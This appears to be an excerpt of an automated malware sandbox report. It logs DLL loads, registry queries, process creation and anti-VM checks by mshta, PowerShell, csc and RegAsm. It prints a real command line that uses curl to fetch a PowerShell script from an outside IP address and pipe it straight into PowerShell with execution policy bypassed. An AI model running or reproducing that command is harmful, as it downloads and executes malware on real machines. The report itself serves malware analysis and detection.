Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Windows.Forms.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: System.Drawing.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4107992921.000000000812B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: q8C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp

Data Obfuscation

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041ACF6 push esp; iretd	7_2_0041ACFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00444520 push ebp; ret	7_2_00444522
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043BF00 push eax; mov dword ptr [esp], 49484716h	7_2_0043BF01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 5040, type: MEMORYSTR

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9908

Jump to behavior

